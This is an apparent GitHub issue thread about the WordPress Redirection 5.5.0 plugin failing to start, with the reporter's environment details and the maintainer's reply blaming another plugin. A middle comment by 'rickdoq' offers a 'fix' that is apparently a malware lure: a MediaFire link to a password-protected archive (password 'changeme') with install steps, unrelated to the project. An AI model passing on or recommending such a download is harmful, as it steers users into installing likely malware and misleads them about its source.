### ISSUE TITLE
Problem starting Redirection 5.5.0

### ISSUE THREAD

**Issue by soonyichoi** [johngodley/redirection#3912]
Plugin: 5.5.0 4.2
WordPress: 6.6.1 (single)
PHP: 8.2.18
Browser: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
JavaScript: https://airkbot.com/wp-content/plugins/redirection/redirection.js?ver=5.5.0-eff218e8a6050e14b616f8d6629e0ae4
REST API: https://airkbot.com/wp-json/

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by johngodley** [comment]
Please follow the onscreen instructions. This is likely caused by another plugin.
